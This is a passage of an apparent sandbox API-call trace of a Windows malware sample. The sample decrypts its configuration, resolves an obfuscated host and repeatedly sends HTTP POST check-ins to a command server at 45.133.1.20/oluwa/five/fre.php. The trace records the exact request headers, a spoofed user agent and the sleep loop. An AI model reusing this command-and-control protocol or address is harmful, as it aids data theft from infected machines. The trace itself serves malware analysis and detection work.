phProv=0x19fca8*=0x6beb90) returned 1 [0303.277] GetProcessHeap () returned 0x6a0000 [0303.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6608 [0303.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.278] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b6608, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0303.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.279] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.280] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.280] GetProcessHeap () returned 0x6a0000 [0303.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6608 | out: hHeap=0x6a0000) returned 1 [0303.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.282] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0303.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.283] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0303.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.284] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0303.284] GetProcessHeap () returned 0x6a0000 [0303.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0303.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.285] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0303.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.293] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0303.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.294] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0303.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.298] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0303.298] GetProcessHeap () returned 0x6a0000 [0303.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0303.298] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0303.298] GetProcessHeap () returned 0x6a0000 [0303.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0303.299] GetProcessHeap () returned 0x6a0000 [0303.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0303.300] GetProcessHeap () returned 0x6a0000 [0303.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0303.300] GetProcessHeap () returned 0x6a0000 [0303.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0303.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.301] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.311] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0303.318] GetProcessHeap () returned 0x6a0000 [0303.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0303.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.320] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0303.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.321] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.322] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.322] GetProcessHeap () returned 0x6a0000 [0303.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0303.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.323] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0303.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.324] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0303.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.325] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0303.325] GetProcessHeap () returned 0x6a0000 [0303.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0303.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.326] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0303.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.327] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0303.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.328] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0303.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.332] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0303.332] GetProcessHeap () returned 0x6a0000 [0303.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0303.332] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0303.332] GetProcessHeap () returned 0x6a0000 [0303.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0303.332] socket (af=2, type=1, protocol=6) returned 0xb7c [0303.332] connect (s=0xb7c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0303.359] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0303.359] GetProcessHeap () returned 0x6a0000 [0303.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0303.359] GetProcessHeap () returned 0x6a0000 [0303.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da320 [0303.359] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0303.361] wvsprintfA (in: param_1=0x6da320, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0303.361] GetProcessHeap () returned 0x6a0000 [0303.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6840 [0303.361] GetProcessHeap () returned 0x6a0000 [0303.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0303.361] GetProcessHeap () returned 0x6a0000 [0303.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0303.361] GetProcessHeap () returned 0x6a0000 [0303.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da320 [0303.362] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0303.363] wvsprintfA (in: param_1=0x6da320, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0303.363] GetProcessHeap () returned 0x6a0000 [0303.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0303.363] GetProcessHeap () returned 0x6a0000 [0303.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0303.364] send (s=0xb7c, buf=0x6bd460*, len=242, flags=0) returned 242 [0303.365] send (s=0xb7c, buf=0x6bb998*, len=159, flags=0) returned 159 [0303.366] GetProcessHeap () returned 0x6a0000 [0303.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0303.366] recv (in: s=0xb7c, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0303.453] GetProcessHeap () returned 0x6a0000 [0303.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0303.457] GetProcessHeap () returned 0x6a0000 [0303.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0303.463] GetProcessHeap () returned 0x6a0000 [0303.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6840 | out: hHeap=0x6a0000) returned 1 [0303.465] GetProcessHeap () returned 0x6a0000 [0303.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0303.466] closesocket (s=0xb7c) returned 0 [0303.467] GetProcessHeap () returned 0x6a0000 [0303.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0303.467] GetProcessHeap () returned 0x6a0000 [0303.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0303.473] GetProcessHeap () returned 0x6a0000 [0303.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0303.478] GetProcessHeap () returned 0x6a0000 [0303.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0303.485] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18b4) returned 0xb7c [0303.488] Sleep (dwMilliseconds=0xea60) [0303.508] GetProcessHeap () returned 0x6a0000 [0303.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0303.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.513] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.820] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0303.899] GetProcessHeap () returned 0x6a0000 [0303.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0303.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.947] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0303.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.948] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.950] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.950] GetProcessHeap () returned 0x6a0000 [0303.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0303.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.951] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0303.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.955] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0303.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.956] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0303.956] GetProcessHeap () returned 0x6a0000 [0303.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0303.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.958] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0303.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.959] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0303.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.960] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0303.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.961] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0303.962] GetProcessHeap () returned 0x6a0000 [0303.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0303.962] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0303.962] GetProcessHeap () returned 0x6a0000 [0303.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0303.963] GetProcessHeap () returned 0x6a0000 [0303.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0303.963] GetProcessHeap () returned 0x6a0000 [0303.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0303.964] GetProcessHeap () returned 0x6a0000 [0303.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0303.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.968] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.976] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0303.984] GetProcessHeap () returned 0x6a0000 [0303.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0303.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.987] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0303.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.988] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.990] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.990] GetProcessHeap () returned 0x6a0000 [0303.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0303.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.992] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0303.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.993] CryptDestroyKey (hKey=0x6ad020) returned 1 [0303.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0303.994] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0303.994] GetProcessHeap () returned 0x6a0000 [0303.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0303.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.996] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0303.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.999] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0304.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.001] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0304.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.002] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0304.002] GetProcessHeap () returned 0x6a0000 [0304.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0304.002] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0304.002] GetProcessHeap () returned 0x6a0000 [0304.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0304.002] socket (af=2, type=1, protocol=6) returned 0xb80 [0304.003] connect (s=0xb80, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0304.029] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0304.029] GetProcessHeap () returned 0x6a0000 [0304.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0304.029] GetProcessHeap () returned 0x6a0000 [0304.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da320 [0304.030] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0304.032] wvsprintfA (in: param_1=0x6da320, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0304.033] GetProcessHeap () returned 0x6a0000 [0304.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6c00 [0304.033] GetProcessHeap () returned 0x6a0000 [0304.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0304.033] GetProcessHeap () returned 0x6a0000 [0304.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0304.034] GetProcessHeap () returned 0x6a0000 [0304.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da320 [0304.034] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0304.035] wvsprintfA (in: param_1=0x6da320, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0304.035] GetProcessHeap () returned 0x6a0000 [0304.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0304.036] GetProcessHeap () returned 0x6a0000 [0304.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0304.036] send (s=0xb80, buf=0x6bd460*, len=242, flags=0) returned 242 [0304.037] send (s=0xb80, buf=0x6bb998*, len=159, flags=0) returned 159 [0304.037] GetProcessHeap () returned 0x6a0000 [0304.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0304.037] recv (in: s=0xb80, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0304.105] GetProcessHeap () returned 0x6a0000 [0304.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0304.106] GetProcessHeap () returned 0x6a0000 [0304.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0304.107] GetProcessHeap () returned 0x6a0000 [0304.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6c00 | out: hHeap=0x6a0000) returned 1 [0304.110] GetProcessHeap () returned 0x6a0000 [0304.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0304.110] closesocket (s=0xb80) returned 0 [0304.111] GetProcessHeap () returned 0x6a0000 [0304.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0304.111] GetProcessHeap () returned 0x6a0000 [0304.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0304.112] GetProcessHeap () returned 0x6a0000 [0304.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0304.112] GetProcessHeap () returned 0x6a0000 [0304.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0304.113] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18b8) returned 0xb80 [0304.115] Sleep (dwMilliseconds=0xea60) [0304.116] GetProcessHeap () returned 0x6a0000 [0304.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0304.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.119] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.126] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0304.136] GetProcessHeap () returned 0x6a0000 [0304.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0304.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.137] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0304.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.138] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.139] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.139] GetProcessHeap () returned 0x6a0000 [0304.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 